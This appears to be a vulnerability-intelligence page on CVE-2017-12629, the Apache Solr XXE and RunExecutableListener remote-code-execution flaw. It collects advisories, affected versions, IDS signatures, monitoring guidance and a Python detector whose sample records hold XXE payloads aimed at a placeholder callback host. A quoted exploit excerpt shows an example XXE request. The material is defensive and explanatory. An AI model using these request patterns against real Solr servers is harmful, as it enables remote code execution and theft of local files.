CVE-2017-12629
Published 2017-10-14
Priority P183 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT
Exploited in the wild
EPSS: 91.90% (99.8th percentile)
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | solr | 5.5.0 – 5.5.4 | — |
| apache | solr | 6.0.0 – 6.6.1 | — |
| apache | solr | 7.0.0 – 7.0.1 | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | lucene-solr | < lucene-solr 3.6.2+dfsg-11 (bookworm) | lucene-solr 3.6.2+dfsg-11 (bookworm) |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
Detection & IOCs
snort
alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)"; flow:established,to_server; flowbits:isset,ET.CVE-2017-12629; http.method; content:"GET"; http.uri; content:"newcollection/config"; content:"|22|add-listener|22 3a|"; distance:0; content:"|22|event|22 3a 22|postCommit|22|"; distance:0; content:"|22|class|22|"; distance:0; content:"RunExecutableListener|22 2c 22|exe|22|"; distance:0; fast_pattern; content:"|22|dir|22|"; content:"|22|args|22|"; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024886; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_12629, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2024_03_07;)
- Detect XXE exploitation attempts by monitoring HTTP requests to Solr /select endpoints containing 'deftype=xmlparser' query parameter combined with DOCTYPE or ENTITY declarations in the 'q' parameter.
- Monitor for chained exploit: XXE request to /select endpoint followed by POST to /config with RunExecutableListener, then POST to /update to trigger postCommit event execution.
- Alert on Solr requests using the ftp:// wrapper in XXE payloads, which is used for Blind XXE to exfiltrate local files.
- Monitor for POST requests to /solr/<collection>/update with JSON body after a RunExecutableListener has been registered, as this triggers the postCommit event and executes the configured command.
- Use the Nuclei template detection logic: probe /solr/admin/cores?wt=json to enumerate collection names, then send XXE payload to /solr/<core>/select with deftype=xmlparser and an out-of-band callback URL.
- Elasticsearch is explicitly NOT vulnerable to this CVE despite using Lucene.
- The RCE vector (RunExecutableListener via Config API) can be blocked by starting Solr with '-Ddisable.configEdit=true', which disallows Config API changes but does not fix the underlying XXE.
- The XML Query Parser (deftype=xmlparser) is available by default on all query requests, meaning no authentication is required to trigger the XXE vector.
- Red Hat JBoss Enterprise Application Platform 7 ships the vulnerable lucene-queryparser jar as a dependency; applications reusing it may be vulnerable to the XXE aspect only (not the RCE via Config API).
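The request correlation described in the monitoring items above, written out as an added example (not code from this page or from any of the quoted sources). The record layout, collection names, source addresses and the `callback.invalid` host are constructed assumptions; the listener values are placeholders.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed request records, as a reverse proxy with body capture might log
# them. Hosts, collection names and listener values are placeholders.
RECORDS = [
    {"ts": 1, "src": "192.0.2.10", "method": "GET", "body": "",
     "uri": "/solr/demo/select?defType=xmlparser"
            "&q=%3CTermQuery+fieldName%3D%22title%22%3Esolr%3C%2FTermQuery%3E"},
    {"ts": 2, "src": "198.51.100.7", "method": "GET", "body": "",
     "uri": "/solr/demo/select?q=%7B%21xmlparser+v%3D%27%3C%21DOCTYPE+a+SYSTEM+"
            "%22http%3A%2F%2Fcallback.invalid%2Fx%22%3E%27%7D"},
    {"ts": 3, "src": "198.51.100.7", "method": "POST", "uri": "/solr/demo/config",
     "body": '{"add-listener": {"event": "postCommit", "name": "placeholder", '
             '"class": "solr.RunExecutableListener", "exe": "<placeholder>", '
             '"dir": "<placeholder>", "args": ["<placeholder>"]}}'},
    {"ts": 4, "src": "198.51.100.7", "method": "POST", "uri": "/solr/demo/update",
     "body": '[{"id": "placeholder"}]'},
    {"ts": 5, "src": "192.0.2.10", "method": "POST", "uri": "/solr/other/update",
     "body": '[{"id": "routine-index-job"}]'},
    {"ts": 6, "src": "203.0.113.9", "method": "GET", "body": "",
     "uri": "/solr/other/select?defType=xmlparser&q=%3C%21DOCTYPE+a+%5B%3C%21ENTITY"
            "+%25+b+SYSTEM+%22ftp%3A%2F%2Fcallback.invalid%2F%22%3E%5D%3E"},
]

HANDLER = re.compile(r"^/solr/([^/]+)/(select|config|update)\b")
DTD = re.compile(r"<!(?:DOCTYPE|ENTITY)", re.I)


def scan(records):
    """Return (ts, src, collection, stage) for every suspicious request."""
    armed = set()  # collections where a RunExecutableListener was registered
    alerts = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        parts = urlsplit(rec["uri"])
        m = HANDLER.match(parts.path)
        if not m:
            continue
        coll, handler = m.groups()
        params = {k.lower(): " ".join(v) for k, v in parse_qs(parts.query).items()}
        q = params.get("q", "")
        stage = None
        if handler == "select":
            xmlparser = (params.get("deftype", "").lower() == "xmlparser"
                         or "{!xmlparser" in q.lower())
            # A plain xmlparser query is legitimate; a DTD inside it is not.
            if xmlparser and DTD.search(q):
                stage = "XXE_FTP" if "ftp://" in q.lower() else "XXE"
        elif handler == "config":
            # The command can sit in the body (POST) or in the URI (GET).
            blob = unquote_plus(parts.query) + rec["body"]
            if "add-listener" in blob and "RunExecutableListener" in blob:
                armed.add(coll)
                stage = "LISTENER"
        elif rec["method"] == "POST" and coll in armed:
            # /update is routine traffic; only flag it once a listener exists.
            stage = "TRIGGER"
        if stage:
            alerts.append((rec["ts"], rec["src"], coll, stage))
    return alerts


def full_chains(alerts):
    """Collections that saw XXE, then listener registration, then a commit."""
    order = ["XXE", "LISTENER", "TRIGGER"]
    progress = {}
    for _, _, coll, stage in alerts:
        step = progress.get(coll, 0)
        if step < len(order) and stage.split("_")[0] == order[step]:
            progress[coll] = step + 1
    return sorted(c for c, s in progress.items() if s == len(order))


if __name__ == "__main__":
    for alert in scan(RECORDS):
        print(alert)
    print("full chain on:", full_chains(scan(RECORDS)))
```

The benign `xmlparser` query at `ts` 1 and the routine `/update` at `ts` 5 are deliberately left unflagged, since both are normal Solr traffic on their own.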
CVSS provenance
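| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | | 9.8 | CRITICAL | |
| vendor_debian | | 9.8 | CRITICAL | |
| vendor_redhat | | 9.8 | CRITICAL | |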
OSV
Remote code execution occurs in Apache Solr
osv·2018-10-17
CVE-2017-12629 [CRITICAL] Remote code execution occurs in Apache Solr
Remote code execution occurs in Apache Solr before versions 5.5.5, 6.6.2 and 7.1.0 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected vers
GHSA
Remote code execution occurs in Apache Solr
ghsa·2018-10-17
CVE-2017-12629 [CRITICAL] CWE-611 Remote code execution occurs in Apache Solr
OSV
CVE-2017-12629: Remote code execution occurs in Apache Solr before 7
osv·2017-10-14·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629: Remote code execution occurs in Apache Solr before 7
Ubuntu
Apache Solr vulnerability
vendor_ubuntu·2020-01-29
CVE-2017-12629 Apache Solr vulnerability
Title: Apache Solr vulnerability
Summary: Apache Solr could be made to run programs if it received
specially crafted network traffic.
Michael Stepankin and Olga Barinova discovered that Apache Solr was
vulnerable to an XXE attack. An attacker could use this vulnerability to
remotely execute code.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
Solr: Code execution via entity expansion
vendor_redhat·2017-10-12·CVSS 9.8
CVE-2017-12629 [CRITICAL] CWE-138 Solr: Code execution via entity expansion
Debian
CVE-2017-12629: lucene-solr - Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before...
vendor_debian·2017·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629: lucene-solr - Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before...
Scope: local
bookworm: resolv
Suricata
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)
Suricata
ET EXPLOIT Possible CVE-2017-12629 XXE Exploit Attempt (URI)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 XXE Exploit Attempt (URI)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 XXE Exploit Attempt (URI)"; flow:established,to_server; flowbits:set,ET.CVE-2017-12629; http.uri; content:"?q=|7b 21|xmlparser"; content:"|3d 27 3c 21|DOCTYPE"; nocase; distance:0; fast_pattern; pcre:"/^(?:(?!\x0d\x0a).)+\x22(?:https?|file):\x2f\x2f/R"; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024885; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_12629, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 2)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 2)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 2)"; flow:established,to_server; flowbits:isset,ET.CVE-2017-12629; http.method; content:"GET"; http.uri; content:"?q="; content:"update?"; distance:0; content:"stream.body="; content:"commit="; content:"overwrite="; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024887; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_12629, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP POST)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP POST)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP POST)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"newcollection/config"; http.request_body; content:"|22|add-listener|22|"; content:"|22|event|22 3a 22|postCommit|22|"; content:"|22|class|22|"; content:"RunExecutableListener|22 2c|"; fast_pattern; content:"|22|exe|22|"; content:"|22|dir|22|"; content:"|22|args|22|"; http.content_type; content:"application/json"; startswith; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024884; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_126
Exploit-DB
Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
exploitdb·2017-10-17
CVE-2017-12629 Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
---
First Vulnerability: XML External Entity Expansion (deftype=xmlparser)
Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in the search query.
The problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://):
Example usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v=''}
When Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx and tr
Nuclei
Apache Solr <= 7.1 - XML Entity Injection
nuclei·CVSS 9.8
CVE-2017-12629 [CRITICAL] Apache Solr <= 7.1 - XML Entity Injection
Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected version
Bugzilla
CVE-2017-12629 lucene: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 lucene: Solr: Code execution via entity expansion [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions
Bugzilla
CVE-2017-12629 lucene3: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 lucene3: Solr: Code execution via entity expansion [fedora-all]
Bugzilla
CVE-2017-12629 solr3: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 solr3: Solr: Code execution via entity expansion [fedora-all]
Bugzilla
CVE-2017-12629 lucene4: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 lucene4: Solr: Code execution via entity expansion [fedora-all]
Bugzilla
CVE-2017-12629 Solr: Code execution via entity expansion
bugzilla·2017-10-12·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 Solr: Code execution via entity expansion
It was found that Apache Solr would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code on the server.
Discussion:
Satellite 6.2 and later do not ship lucene so are not vulnerable to this. Satellite 6.0 and 6.1 ship lucene v.4 which is not vulnerable to this issue.
SAM 1.x ships an old version of lucene (v.3) that is not vulnerable to this issue, additionally the affected class does not appear to be used.
---
Mitigation:
Until fixes are available, all Solr users are advised to restart their Solr instances with the system parameter `-Ddisable.configEdit=true`. This will disallo
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Authors: Yue Guan, Jin Chen, Leo Olson, Wayne Xin, Daiping Liu
Published: October 14, 2021
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we